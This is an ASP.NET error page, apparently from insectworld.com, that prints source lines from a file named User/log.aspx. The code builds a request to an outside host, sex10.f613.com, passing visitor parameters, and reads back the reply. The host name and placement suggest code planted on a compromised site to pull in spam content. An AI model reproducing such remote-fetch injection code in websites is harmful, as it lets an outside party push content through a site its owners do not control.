Server Error in '/' Application.

The remote name could not be resolved: 'sex10.f613.com'

Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Net.WebException: The remote name could not be resolved: 'sex10.f613.com'

Source Error:


Line 29: 		   strUrl = ("http://sex10.f613.com/?k="+id+"&h="+h+"&u="+u+"&r="+r)
Line 30: 		   Dim webrequest As WebRequest = WebRequest.Create(strUrl)
Line 31: 		   Dim webresponse As WebResponse = webrequest.GetResponse
Line 32: 		   Dim reader As StreamReader = New StreamReader(webresponse.GetResponseStream, Encoding.GetEncoding("utf-8"))
Line 33: 		   strMsg = reader.ReadToEnd

Source File: D:\InetPub\vhosts\rderosa-448.package\insectworld.com\wwwroot\User\log.aspx    Line: 31

Stack Trace:


[WebException: The remote name could not be resolved: 'sex10.f613.com']
   System.Net.HttpWebRequest.GetResponse() +1699
   ASP.MyPage.pageload() in D:\InetPub\vhosts\rderosa-448.package\insectworld.com\wwwroot\User\log.aspx:31
   ASP.user_log_aspx.__Render__control1(HtmlTextWriter __w, Control parameterContainer) in D:\InetPub\vhosts\rderosa-448.package\insectworld.com\wwwroot\User\log.aspx:54
   System.Web.UI.Control.RenderChildrenInternal(HtmlTextWriter writer, ICollection children) +117
   System.Web.UI.Page.Render(HtmlTextWriter writer) +39
   System.Web.UI.Control.RenderControlInternal(HtmlTextWriter writer, ControlAdapter adapter) +132
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +9490


Version Information: Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.8.4700.0